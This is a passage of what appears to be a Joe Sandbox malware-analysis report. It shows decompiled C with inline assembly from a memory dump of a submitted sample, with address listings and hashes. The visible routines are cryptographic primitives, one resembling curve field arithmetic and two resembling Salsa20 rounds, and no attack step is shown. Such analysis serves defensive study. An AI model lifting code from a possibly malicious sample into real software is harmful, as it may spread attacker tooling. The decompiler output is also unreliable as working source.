				void* _t103;
				void* _t104;
				signed int* _t105;
				void* _t108;
				void* _t109;
				signed int _t116;
				signed int _t118;
				signed int* _t120;
				signed int _t126;
				void* _t129;
				signed int _t133;
				signed int _t134;
				intOrPtr _t136;
				void* _t140;
				void* _t141;
				void* _t145;
				signed int _t150;
				signed int _t153;
				signed int _t169;
				signed int* _t171;
				signed int* _t173;
				void* _t180;
				signed int* _t182;
				signed int* _t183;
				void* _t189;
				void* _t192;
				void* _t195;
				void* _t198;

				_t183 = __edx;
				_t182 = __ecx;
				_t171 = _a4;
				_t133 = 0;
				while(1) {
					_t96 = _a8;
					if(_t171[_t133] != 0) {
						break;
					}
					_t133 = _t133 + 1;
					_t189 = _t133 - 8;
					if(_t189 < 0) {
						continue;
					} else {
						if(_t189 == 0) {
							_t169 = 0;
							while(_t96[_t169] == 0) {
								_t169 = _t169 + 1;
								_t192 = _t169 - 8;
								if(_t192 < 0) {
									continue;
								} else {
									if(_t192 == 0) {
										return _t96;
									} else {
										goto L8;
									}
								}
								goto L41;
							}
						}
						break;
					}
					L41:
				}
				L8:
				_t134 = 0;
				while(_t182[_t134] == 0) {
					_t134 = _t134 + 1;
					_t195 = _t134 - 8;
					if(_t195 < 0) {
						continue;
					} else {
						if(_t195 == 0) {
							_t153 = 0;
							while(_t183[_t153] == 0) {
								_t153 = _t153 + 1;
								_t198 = _t153 - 8;
								if(_t198 < 0) {
									continue;
								} else {
									if(_t198 != 0) {
										goto L17;
									} else {
										 *_t182 =  *_t171;
										_t182[1] = _t171[1];
										_t182[2] = _t171[2];
										_t182[3] = _t171[3];
										_t182[4] = _t171[4];
										_t182[5] = _t171[5];
										_t182[6] = _t171[6];
										_t182[7] = _t171[7];
										 *_t183 =  *_t96;
										_t183[1] = _t96[1];
										_t183[2] = _t96[2];
										_t183[3] = _t96[3];
										_t183[4] = _t96[4];
										_t183[5] = _t96[5];
										_t118 = _t96[7];
										_t183[6] = _t96[6];
										_t183[7] = _t118;
										return _t118;
									}
								}
								goto L41;
							}
						}
						break;
					}
					goto L41;
				}
				L17:
				_v8 = 0;
				_t136 = _t182 - _t171;
				_t120 = _t171;
				_v12 = _t136;
				while( *((intOrPtr*)(_t136 + _t120)) ==  *_t120) {
					_t120 =  &(_t120[1]);
					_t150 = _v8 + 1;
					_v8 = _t150;
					_t136 = _v12;
					if(_t150 < 8) {
						continue;
					}
					_t180 = 0;
					_t129 = _t183 - _t96;
					while( *((intOrPtr*)(_t129 + _t96)) ==  *_t96) {
						_t180 = _t180 + 1;
						_t96 =  &(_t96[1]);
						if(_t180 < 8) {
							continue;
						} else {
							return E00401480(_t182, _t183);
						}
						goto L41;
					}
					 *_t182 = 0;
					_t182[1] = 0;
					_t182[2] = 0;
					_t182[3] = 0;
					_t182[4] = 0;
					_t182[5] = 0;
					_t182[6] = 0;
					_t182[7] = 0;
					 *_t183 = 0;
					_t183[1] = 0;
					_t183[2] = 0;
					_t183[3] = 0;
					_t183[4] = 0;
					_t183[5] = 0;
					_t183[6] = 0;
					_t183[7] = 0;
					return _t96;
					goto L41;
				}
				_v8 =  &_v108 - _t96;
				_t140 = 2;
				do {
					_t96 =  &(_t96[4]);
					asm("movups xmm1, [eax+ebx-0x10]");
					asm("movups xmm0, [eax-0x10]");
					asm("pxor xmm1, xmm0");
					asm("movups [edx+eax-0x10], xmm1");
					_t140 = _t140 - 1;
				} while (_t140 != 0);
				_t173 = _a4;
				_t141 = 2;
				do {
					_t173 =  &(_t173[4]);
					asm("movups xmm1, [edx+eax-0x10]");
					asm("movups xmm0, [edx-0x10]");
					asm("pxor xmm1, xmm0");
					asm("movups [ebx+edx-0x10], xmm1");
					_t141 = _t141 - 1;
				} while (_t141 != 0);
				E00401240( &_v76,  &_v140);
				E004010F0( &_v76,  &_v76,  &_v108);
				E004010F0( &_v44,  &_v76,  &_v76);
				_t103 = 0;
				do {
					asm("movups xmm0, [ebp+eax-0x28]");
					asm("movups xmm1, [ebp+eax-0x48]");
					asm("pxor xmm1, xmm0");
					asm("movups [ebp+eax-0x28], xmm1");
					_t103 = _t103 + 0x10;
				} while (_t103 < 0x20);
				_t104 = 0;
				do {
					asm("movups xmm0, [ebp+eax-0x28]");
					asm("movups xmm1, [ebp+eax-0x88]");
					asm("pxor xmm1, xmm0");
					asm("movups [ebp+eax-0x28], xmm1");
					_t104 = _t104 + 0x10;
				} while (_t104 < 0x20);
				_t126 = _v44 ^ 0x00000001;
				_t105 = _t182;
				_v44 = _t126;
				_t145 = 2;
				do {
					_t105 =  &(_t105[4]);
					asm("movups xmm0, [eax-0x10]");
					asm("movups xmm1, [edx+eax-0x10]");
					asm("pxor xmm1, xmm0");
					asm("movups [eax-0x10], xmm1");
					_t145 = _t145 - 1;
				} while (_t145 != 0);
				E004010F0( &_v108, _t182,  &_v76);
				_t108 = 0;
				do {
					asm("movups xmm0, [ebp+eax-0x68]");
					asm("movups xmm1, [ebp+eax-0x28]");
					asm("pxor xmm1, xmm0");
					asm("movups [ebp+eax-0x68], xmm1");
					_t108 = _t108 + 0x10;
				} while (_t108 < 0x20);
				_t109 = 2;
				asm("o16 nop [eax+eax]");
				do {
					_t183 =  &(_t183[4]);
					asm("movups xmm0, [esi-0x10]");
					asm("movups xmm1, [ecx+esi-0x10]");
					asm("pxor xmm1, xmm0");
					asm("movups [esi-0x10], xmm1");
					_t109 = _t109 - 1;
				} while (_t109 != 0);
				_t182[1] = _v40;
				_t182[2] = _v36;
				_t182[3] = _v32;
				_t182[4] = _v28;
				_t182[5] = _v24;
				_t182[6] = _v20;
				_t116 = _v16;
				 *_t182 = _t126;
				_t182[7] = _t116;
				return _t116;
			}













































0x004015ab
0x004015ad
0x004015af
0x004015b2
0x004015b4
0x004015b8
0x004015bb
0x00000000
0x00000000
0x004015bd
0x004015be
0x004015c1
0x00000000
0x004015c3
0x004015c3
0x004015c5
0x004015c7
0x004015cd
0x004015ce
0x004015d1
0x00000000
0x004015d3
0x004015d3
0x004018bb
0x00000000
0x00000000
0x00000000
0x004015d3
0x00000000
0x004015d1
0x004015c7
0x00000000
0x004015c3
0x00000000
0x004015c1
0x004015d9
0x004015d9
0x004015e0
0x004015e6
0x004015e7
0x004015ea
0x00000000
0x004015ec
0x004015ec
0x004015ee
0x004015f0
0x004015f6
0x004015f7
0x004015fa
0x00000000
0x004015fc
0x004015fc
0x00000000
0x004015fe
0x00401600
0x00401605
0x0040160b
0x00401611
0x00401617
0x0040161d
0x00401623
0x00401629
0x0040162e
0x00401633
0x00401639
0x0040163f
0x00401645
0x0040164b
0x00401651
0x00401655
0x00401658
0x0040165f
0x0040165f
0x004015fc
0x00000000
0x004015fa
0x004015f0
0x00000000
0x004015ec
0x00000000
0x004015ea
0x00401660
0x00401662
0x00401669
0x0040166c
0x0040166e
0x00401671
0x0040167f
0x00401682
0x00401683
0x00401689
0x0040168c
0x00000000
0x00000000
0x00401690
0x00401692
0x00401694
0x0040169b
0x0040169c
0x004016a2
0x00000000
0x004016a4
0x004016b3
0x004016b3
0x00000000
0x004016a2
0x004016b5
0x004016bb
0x004016c2
0x004016c9
0x004016d0
0x004016d7
0x004016de
0x004016e5
0x004016ed
0x004016f3
0x004016fa
0x00401701
0x00401708
0x0040170f
0x00401716
0x0040171d
0x00401728
0x00000000
0x00401728
0x00401732
0x00401735
0x00401740
0x00401740
0x00401743
0x00401748
0x0040174c
0x00401750
0x00401755
0x00401755
0x0040175a
0x00401768
0x00401770
0x00401770
0x00401773
0x00401778
0x0040177c
0x00401780
0x00401785
0x00401785
0x00401793
0x004017a1
0x004017af
0x004017b7
0x004017c0
0x004017c0
0x004017c5
0x004017ca
0x004017ce
0x004017d3
0x004017d6
0x004017db
0x004017e0
0x004017e0
0x004017e5
0x004017ed
0x004017f1
0x004017f6
0x004017f9
0x00401804
0x00401807
0x00401809
0x0040180e
0x00401813
0x00401813
0x00401816
0x0040181a
0x0040181f
0x00401823
0x00401827
0x00401827
0x00401835
0x0040183d
0x00401840
0x00401840
0x00401845
0x0040184a
0x0040184e
0x00401853
0x00401856
0x0040185e
0x00401865
0x00401870
0x00401870
0x00401873
0x00401877
0x0040187c
0x00401880
0x00401884
0x00401884
0x0040188c
0x00401892
0x00401898
0x0040189e
0x004018a4
0x004018aa
0x004018ad
0x004018b0
0x004018b2
0x00000000

Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp Download File
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID:
  • String ID:
  • API String ID:
  • Opcode ID: 8cb74fc443f393d4937114ad28006b61f474509722a6e899e2b7741a24204fdc
  • Instruction ID: 0562f3e263282b1222dac1fc98c5a5a7ec445371b79d9260e02e3a38dc2343f8
  • Opcode Fuzzy Hash: 8cb74fc443f393d4937114ad28006b61f474509722a6e899e2b7741a24204fdc
  • Instruction Fuzzy Hash: A7B1A1709006098FDB18CF28D591BA9F7B0FF99304F14C66ED849A77A2DB74A9C4CB90
Uniqueness

Uniqueness Score: -1.00%

Download Yara Rule
C-Code - Quality: 62%
			E00403780(signed int* __ecx) {
				signed int _t54;
				signed int _t60;
				signed int _t66;
				signed int _t72;
				signed int _t74;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t92;

				_t85 =  *__ecx;
				_t89 = __ecx[0xc];
				asm("rol eax, 0x7");
				__ecx[4] = __ecx[4] ^ _t85 + _t89;
				_t77 = __ecx[4];
				asm("rol eax, 0x9");
				__ecx[8] = __ecx[8] ^ _t77 + _t85;
				_t81 = __ecx[8];
				asm("rol eax, 0xd");
				_t54 = _t81 + _t77 ^ _t89;
				_t90 = __ecx[1];
				__ecx[0xc] = _t54;
				asm("ror eax, 0xe");
				_t86 = __ecx[5];
				 *__ecx = _t54 + _t81 ^ _t85;
				asm("rol eax, 0x7");
				__ecx[9] = __ecx[9] ^ _t86 + _t90;
				_t78 = __ecx[9];
				asm("rol eax, 0x9");
				__ecx[0xd] = __ecx[0xd] ^ _t78 + _t86;
				_t82 = __ecx[0xd];
				asm("rol eax, 0xd");
				_t60 = _t82 + _t78 ^ _t90;
				_t91 = __ecx[6];
				__ecx[1] = _t60;
				asm("ror eax, 0xe");
				_t87 = __ecx[0xa];
				__ecx[5] = _t60 + _t82 ^ _t86;
				asm("rol eax, 0x7");
				__ecx[0xe] = __ecx[0xe] ^ _t87 + _t91;
				_t79 = __ecx[0xe];
				asm("rol eax, 0x9");
				__ecx[2] = __ecx[2] ^ _t79 + _t87;
				_t83 = __ecx[2];
				asm("rol eax, 0xd");
				_t66 = _t83 + _t79 ^ _t91;
				_t92 = __ecx[0xb];
				__ecx[6] = _t66;
				asm("ror eax, 0xe");
				_t88 = __ecx[0xf];
				__ecx[0xa] = _t66 + _t83 ^ _t87;
				asm("rol eax, 0x7");
				__ecx[3] = __ecx[3] ^ _t88 + _t92;
				_t80 = __ecx[3];
				asm("rol eax, 0x9");
				__ecx[7] = __ecx[7] ^ _t80 + _t88;
				_t84 = __ecx[7];
				asm("rol eax, 0xd");
				_t72 = _t84 + _t80 ^ _t92;
				__ecx[0xb] = _t72;
				asm("ror eax, 0xe");
				_t74 = _t72 + _t84 ^ _t88;
				__ecx[0xf] = _t74;
				return _t74;
			}
























0x00403785
0x00403787
0x0040378d
0x00403790
0x00403793
0x00403799
0x0040379c
0x0040379f
0x004037a5
0x004037a8
0x004037aa
0x004037ad
0x004037b2
0x004037b7
0x004037ba
0x004037bf
0x004037c2
0x004037c5
0x004037cb
0x004037ce
0x004037d1
0x004037d7
0x004037da
0x004037dc
0x004037df
0x004037e4
0x004037e9
0x004037ec
0x004037f2
0x004037f5
0x004037f8
0x004037fe
0x00403801
0x00403804
0x0040380a
0x0040380d
0x0040380f
0x00403812
0x00403817
0x0040381c
0x0040381f
0x00403825
0x00403828
0x0040382b
0x00403831
0x00403834
0x00403837
0x0040383d
0x00403840
0x00403842
0x00403847
0x0040384a
0x0040384e
0x00403852

Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp Download File
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID:
  • String ID:
  • API String ID:
  • Opcode ID: e3b106e1137a2f6526024d9419026bcc8076fc67c436758deb0114605f6d57e3
  • Instruction ID: 5f9c2fa85bd04c7279ec7dc59c17b89f204f91a6b12579afeed664e27c2dd38a
  • Opcode Fuzzy Hash: e3b106e1137a2f6526024d9419026bcc8076fc67c436758deb0114605f6d57e3
  • Instruction Fuzzy Hash: C431C9B5510206CFCF84DF29C8C5882B7E9FB8825476595AACC05CF21AE374EA5ACFD0
Uniqueness

Uniqueness Score: -1.00%

Download Yara Rule
C-Code - Quality: 62%
			E004036A0(signed int* __ecx) {
				signed int _t54;
				signed int _t60;
				signed int _t66;
				signed int _t72;
				signed int _t74;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t92;

				_t85 =  *__ecx;
				_t89 = __ecx[3];
				asm("rol eax, 0x7");
				__ecx[1] = __ecx[1] ^ _t85 + _t89;
				_t77 = __ecx[1];
				asm("rol eax, 0x9");
				__ecx[2] = __ecx[2] ^ _t77 + _t85;
				_t81 = __ecx[2];
				asm("rol eax, 0xd");
				_t54 = _t81 + _t77 ^ _t89;
				_t90 = __ecx[4];
				__ecx[3] = _t54;
				asm("ror eax, 0xe");
				_t86 = __ecx[5];
				 *__ecx = _t54 + _t81 ^ _t85;
				asm("rol eax, 0x7");
				__ecx[6] = __ecx[6] ^ _t86 + _t90;
				_t78 = __ecx[6];
				asm("rol eax, 0x9");
				__ecx[7] = __ecx[7] ^ _t78 + _t86;
				_t82 = __ecx[7];
				asm("rol eax, 0xd");
				_t60 = _t82 + _t78 ^ _t90;
				_t91 = __ecx[9];
				__ecx[4] = _t60;
				asm("ror eax, 0xe");
				_t87 = __ecx[0xa];
				__ecx[5] = _t60 + _t82 ^ _t86;
				asm("rol eax, 0x7");
				__ecx[0xb] = __ecx[0xb] ^ _t87 + _t91;
				_t79 = __ecx[0xb];
				asm("rol eax, 0x9");
				__ecx[8] = __ecx[8] ^ _t79 + _t87;
				_t83 = __ecx[8];
				asm("rol eax, 0xd");
				_t66 = _t83 + _t79 ^ _t91;
				_t92 = __ecx[0xe];
				__ecx[9] = _t66;
				asm("ror eax, 0xe");
				_t88 = __ecx[0xf];
				__ecx[0xa] = _t66 + _t83 ^ _t87;
				asm("rol eax, 0x7");
				__ecx[0xc] = __ecx[0xc] ^ _t88 + _t92;
				_t80 = __ecx[0xc];
				asm("rol eax, 0x9");
				__ecx[0xd] = __ecx[0xd] ^ _t80 + _t88;
				_t84 = __ecx[0xd];
				asm("rol eax, 0xd");
				_t72 = _t84 + _t80 ^ _t92;
				__ecx[0xe] = _t72;
				asm("ror eax, 0xe");
				_t74 = _t72 + _t84 ^ _t88;
				__ecx[0xf] = _t74;
				return _t74;
			}
























0x004036a5
0x004036a7
0x004036ad
0x004036b0
0x004036b3
0x004036b9
0x004036bc
0x004036bf
0x004036c5
0x004036c8
0x004036ca
0x004036cd
0x004036d2
0x004036d7
0x004036da
0x004036df
0x004036e2
0x004036e5
0x004036eb
0x004036ee
0x004036f1
0x004036f7
0x004036fa
0x004036fc
0x004036ff
0x00403704
0x00403709
0x0040370c
0x00403712
0x00403715
0x00403718
0x0040371e
0x00403721
0x00403724
0x0040372a
0x0040372d
0x0040372f
0x00403732
0x00403737
0x0040373c
0x0040373f
0x00403745
0x00403748
0x0040374b
0x00403751
0x00403754
0x00403757
0x0040375d
0x00403760
0x00403762
0x00403767
0x0040376a
0x0040376e
0x00403772

Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp Download File
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID:
  • String ID:
  • API String ID:
  • Opcode ID: fe908915731aae9e7002019e2ae205669ce4d0858ed82aba9b0a752a773b5fb5
  • Instruction ID: d5bb8ea4cda88cb471418a764478014c9aedac2b4edce145b518b2bf5724addd
  • Opcode Fuzzy Hash: fe908915731aae9e7002019e2ae205669ce4d0858ed82aba9b0a752a773b5fb5
  • Instruction Fuzzy Hash: 0731C9B5510206CFCF84DF29C8C588277E9FB8825476595AACC05CF21AE374EA5ACFD0
Uniqueness

Uniqueness Score: -1.00%